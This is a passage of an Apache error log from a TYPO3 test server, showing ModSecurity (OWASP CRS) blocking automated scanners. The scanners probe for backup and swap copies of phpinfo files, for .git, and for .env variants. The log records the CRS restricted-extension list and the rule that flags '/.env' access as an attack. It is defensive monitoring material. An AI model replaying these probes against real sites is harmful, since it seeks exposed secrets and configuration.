"aSAtPT27u3u2us0kkkbyCAAAAAE"]
[Fri Nov 21 10:13:33.205286 2025] [:error] [pid 223953] [client 15.223.224.122:38130] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aSAtPT27u3u2us0kkkbyCAAAAAE"]
[Fri Nov 21 10:13:33.205448 2025] [:error] [pid 223953] [client 15.223.224.122:38130] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.old"] [unique_id "aSAtPT27u3u2us0kkkbyCAAAAAE"]
[Fri Nov 21 10:13:33.208747 2025] [authz_core:error] [pid 229748] [client 15.223.224.122:38190] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpinfo.php~
[Fri Nov 21 10:13:33.278088 2025] [authz_core:error] [pid 229746] [client 15.223.224.122:38180] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/info.php~
[Fri Nov 21 10:13:33.356842 2025] [authz_core:error] [pid 224162] [client 15.223.224.122:38160] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/phpinfo.php.swp
[Fri Nov 21 10:13:33.457739 2025] [authz_core:error] [pid 223954] [client 15.223.224.122:38314] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_info.php~
[Fri Nov 21 10:13:33.470684 2025] [:error] [pid 223953] [client 15.223.224.122:38302] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aSAtPT27u3u2us0kkkbyCQAAAAE"]
[Fri Nov 21 10:13:33.471004 2025] [:error] [pid 223953] [client 15.223.224.122:38302] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aSAtPT27u3u2us0kkkbyCQAAAAE"]
[Fri Nov 21 10:13:33.471177 2025] [:error] [pid 223953] [client 15.223.224.122:38302] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/test.php.backup"] [unique_id "aSAtPT27u3u2us0kkkbyCQAAAAE"]
[Fri Nov 21 10:13:33.489361 2025] [:error] [pid 229744] [client 15.223.224.122:38184] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aSAtPYml-svsT9-_8bDeGgAAAAY"]
[Fri Nov 21 10:13:33.489663 2025] [:error] [pid 229744] [client 15.223.224.122:38184] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aSAtPYml-svsT9-_8bDeGgAAAAY"]
[Fri Nov 21 10:13:33.489815 2025] [:error] [pid 229744] [client 15.223.224.122:38184] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/phpinfo.php.backup"] [unique_id "aSAtPYml-svsT9-_8bDeGgAAAAY"]
[Fri Nov 21 10:13:33.615889 2025] [:error] [pid 229750] [client 15.223.224.122:38150] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aSAtPcpjtCyjtMB8Q0hnDQAAAAg"]
[Fri Nov 21 10:13:33.616247 2025] [:error] [pid 229750] [client 15.223.224.122:38150] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aSAtPcpjtCyjtMB8Q0hnDQAAAAg"]
[Fri Nov 21 10:13:33.616447 2025] [:error] [pid 229750] [client 15.223.224.122:38150] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/php_info.php.backup"] [unique_id "aSAtPcpjtCyjtMB8Q0hnDQAAAAg"]
[Fri Nov 21 10:13:33.633710 2025] [:error] [pid 229748] [client 15.223.224.122:38278] [client 15.223.224.122] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aSAtPdEJC1U4VjSlcjQokQAAAAU"]
[Fri Nov 21 10:13:33.634018 2025] [:error] [pid 229748] [client 15.223.224.122:38278] [client 15.223.224.122] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aSAtPdEJC1U4VjSlcjQokQAAAAU"]
[Fri Nov 21 10:13:33.634187 2025] [:error] [pid 229748] [client 15.223.224.122:38278] [client 15.223.224.122] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aSAtPdEJC1U4VjSlcjQokQAAAAU"]
[Fri Nov 21 10:13:33.730230 2025] [authz_core:error] [pid 223955] [client 15.223.224.122:38598] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/info.php.swp
[Fri Nov 21 10:13:33.898640 2025] [authz_core:error] [pid 223952] [client 15.223.224.122:38630] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/php_info.php.swp
[Fri Nov 21 10:13:39.363207 2025] [authz_core:error] [pid 223953] [client 15.223.224.122:41228] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/test.php.swp
[Fri Nov 21 10:13:52.009139 2025] [authz_core:error] [pid 223952] [client 15.223.224.122:48032] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Nov 22 00:05:05.185196 2025] [:error] [pid 243343] [client 3.9.175.83:33588] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSDwIYNKGNllPFPT2VHkkwAAAAY"]
[Sat Nov 22 00:05:05.185575 2025] [:error] [pid 243343] [client 3.9.175.83:33588] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSDwIYNKGNllPFPT2VHkkwAAAAY"]
[Sat Nov 22 00:05:05.185818 2025] [:error] [pid 243343] [client 3.9.175.83:33588] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSDwIYNKGNllPFPT2VHkkwAAAAY"]
[Sat Nov 22 00:05:06.082617 2025] [:error] [pid 243340] [client 3.9.175.83:33858] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSDwIpeLEhOLAInnw0NqegAAAAA"]
[Sat Nov 22 00:05:06.082895 2025] [:error] [pid 243340] [client 3.9.175.83:33858] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSDwIpeLEhOLAInnw0NqegAAAAA"]
[Sat Nov 22 00:05:06.083100 2025] [:error] [pid 243340] [client 3.9.175.83:33858] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSDwIpeLEhOLAInnw0NqegAAAAA"]
[Sat Nov 22 00:05:08.074014 2025] [:error] [pid 243344] [client 3.9.175.83:34016] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aSDwJBprncRmilB7cHSokAAAAAg"]
[Sat Nov 22 00:05:08.074285 2025] [:error] [pid 243344] [client 3.9.175.83:34016] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aSDwJBprncRmilB7cHSokAAAAAg"]
[Sat Nov 22 00:05:08.074527 2025] [:error] [pid 243344] [client 3.9.175.83:34016] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aSDwJBprncRmilB7cHSokAAAAAg"]
[Sat Nov 22 00:05:12.797026 2025] [:error] [pid 243342] [client 3.9.175.83:35702] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aSDwKCbqTrlsHApMKqWIiAAAAAI"]
[Sat Nov 22 00:05:12.797258 2025] [:error] [pid 243342] [client 3.9.175.83:35702] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aSDwKCbqTrlsHApMKqWIiAAAAAI"]
[Sat Nov 22 00:05:12.797440 2025] [:error] [pid 243342] [client 3.9.175.83:35702] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aSDwKCbqTrlsHApMKqWIiAAAAAI"]
[Sat Nov 22 00:05:12.822707 2025] [:error] [pid 243390] [client 3.9.175.83:35638] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aSDwKLuOi_dqsgv2AxsAVQAAAAM"]
[Sat Nov 22 00:05:12.822981 2025] [:error] [pid 243390] [client 3.9.175.83:35638] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aSDwKLuOi_dqsgv2AxsAVQAAAAM"]
[Sat Nov 22 00:05:12.823181 2025] [:error] [pid 243390] [client 3.9.175.83:35638] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aSDwKLuOi_dqsgv2AxsAVQAAAAM"]
[Sat Nov 22 00:05:13.170153 2025] [:error] [pid 243341] [client 3.9.175.83:35836] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSDwKQqyqiDG5tICQX6nnwAAAAE"]
[Sat Nov 22 00:05:13.171181 2025] [:error] [pid 243341] [client 3.9.175.83:35836] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSDwKQqyqiDG5tICQX6nnwAAAAE"]
[Sat Nov 22 00:05:13.171410 2025] [:error] [pid 243341] [client 3.9.175.83:35836] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aSDwKQqyqiDG5tICQX6nnwAAAAE"]
[Sat Nov 22 00:05:13.270810 2025] [:error] [pid 243343] [client 3.9.175.83:35888] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSDwKYNKGNllPFPT2VHklAAAAAY"]
[Sat Nov 22 00:05:13.271025 2025] [:error] [pid 243343] [client 3.9.175.83:35888] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSDwKYNKGNllPFPT2VHklAAAAAY"]
[Sat Nov 22 00:05:13.271213 2025] [:error] [pid 243343] [client 3.9.175.83:35888] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSDwKYNKGNllPFPT2VHklAAAAAY"]
[Sat Nov 22 00:05:21.353334 2025] [:error] [pid 243344] [client 3.9.175.83:37916] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aSDwMRprncRmilB7cHSokQAAAAg"]
